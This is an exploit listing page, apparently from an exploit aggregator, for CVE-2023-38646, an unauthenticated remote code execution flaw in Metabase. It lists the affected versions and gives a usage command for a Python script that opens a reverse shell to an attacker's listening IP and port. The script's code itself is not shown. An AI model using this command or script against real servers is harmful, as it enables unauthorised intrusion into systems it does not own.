Share
## https://sploitus.com/exploit?id=3676BFC8-E730-55EA-A4A6-6FA15C5924D8
# CVE-2023-38646 - Metabase RCE
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

If the Metabase version is vulnerable, this script will allow you as attacker to get a shell connection on the target system.

# Usage
```bash
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT
```

# Example
![scriptCapture](https://github.com/birdm4nw/CVE-2023-38646/assets/81826371/c34e4efd-9e5b-450a-8b11-1f00514fd4ba)

**Author:** @birdm4nw

# Reference
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/